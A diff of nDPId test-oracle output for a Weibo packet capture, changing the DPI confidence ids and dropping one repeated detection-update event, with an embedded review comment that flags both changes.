00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1463089072070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072070,"pkt":"eJKcD6iOkDVu60UQCABFAAA0NhEAADYG4CXYOtRBwKgBaQG7h4sGjBrJ+KmsNoAQAV6y1gAAAQEICiUZAmMAQNzC"} 
-00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1463089071613,"flow_last_seen":1463089072125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089072125,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1463089071613,"flow_last_seen":1463089072125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089072125,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1463089072138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072138,"pkt":"eJKcD6iOkDVu60UQCABFAAA0XohAABsGZHc24aPSwKgBaQG7nfhaPbwDA69SioAQAIjCywAAAQEICgEjLGEAQNyy"} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1463089071613,"flow_last_seen":1463089072285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":12516,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1463089072285,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1463089072333,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1463089072333,"pkt":"kDVu60UQeJKcD6iOCABFAAA9J7BAAEARj0XAqAFpwKgBAdEnADUAKd+0rc0BAAABAAAAAAAAA2ltZwF0BnNpbmFqcwJjbgAAAQAB"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": 
{"query":"img.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1463089072444,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1463089072444,"pkt":"eJKcD6iOkDVu60UQCABFAACxAABAAEARtoHAqAEBwKgBaQA10ScAnYbirc2BgAABAAUAAAAAA2ltZwF0BnNpbmFqcwJjbgAAAQABwAwABQABAAAAAAAHBHdjZG7AEsAtAAUAAQAAACoAFQZzaW5hanMFY3NnbGIFdHhjZG7AGcBAAAUAAQAABBMAFAhuNGNzd2hrMwVnY2NkbgNuZXQAwGEAAQABAAAABAAEXbyG9sBhAAEAAQAAAAQABF28hvE="} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089072444,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} 
+00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089072444,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8AXdAAEAGkoHAqAFpXbyG9ovbAFCLeghvAAAAAKACchAFvgAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
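Review bot: The `00897` `detection-update` for flow 11 (packet_id 83) is removed in this hunk with no `+` counterpart, so the expected output holds one event fewer (`-53,14 +53,13`), and the commit message does not say this is intended. Its `ndpi` and `http` objects match the `00892` update at packet_id 54, so upstream may now be suppressing repeated updates, but that is inferred and should be confirmed before this snapshot becomes the new test oracle. Every changed record here, and in the `@@ -73,27 +72,27 @@` hunk that follows, also moves the confidence key from `{"4":"DPI"}` to `{"6":"DPI"}`; a consumer that matches on the numeric id rather than the label could read a different confidence level after the bump. I would record both changes in the commit body, e.g. `confidence id for DPI changes 4 -> 6; the second detection-update for an unchanged flow is no longer emitted`.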
@@ -73,27 +72,27 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0fCpAAEAGF9bAqAFpXbyG9ovcAFB8ZHUyz0aFDoAQAOXm+gAAAQEICgBBCR8Ddgkr"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi90SpJVX19aTZ6AS\/\/\/r1QAAAgQFqAQCCAoDdgksAEEJGAEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0mn9AAEAG+YDAqAFpXbyG9ovdAFDX1pNnEqSVWIAQAOUZqgAAAQEICgBBCR8Ddgks"} 
-00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1463089072471,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/base\/frame.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/combination\/comb_login.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/skin\/default\/skin.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1463089072471,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/base\/frame.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/combination\/comb_login.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/skin\/default\/skin.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1463089072885,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072885,"pkt":"kDVu60UQeJKcD6iOCABFAAA8J\/lAAEARjv3AqAFpwKgBAaGIADUAKAcnK+gBAAABAAAAAAAAAmpzAXQGc2luYWpzAmNuAAABAAE="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073286,"flow_last_seen":1463089073286,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1463089073286,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1463089073286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1463089073286,"pkt":"kDVu60UQeJKcD6iOCABFAABDKCFAAEARjs7AqAFpwKgBAUZzADUAL2deWFEBAAABAAAAAAAAAnUxA2ltZwZtb2JpbGUEc2luYQJjbgAAAQAB"} 
-00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073286,"flow_last_seen":1463089073286,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1463089073286,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073286,"flow_last_seen":1463089073286,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1463089073286,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1463089073287,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1463089073287,"pkt":"kDVu60UQeJKcD6iOCABFAAA\/KCJAAEARjtHAqAFpwKgBAcXQADUAK4SVO9YBAAABAAAAAAAABmFjanN0YgZhbGl5dW4DY29tAAABAAE="} -00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 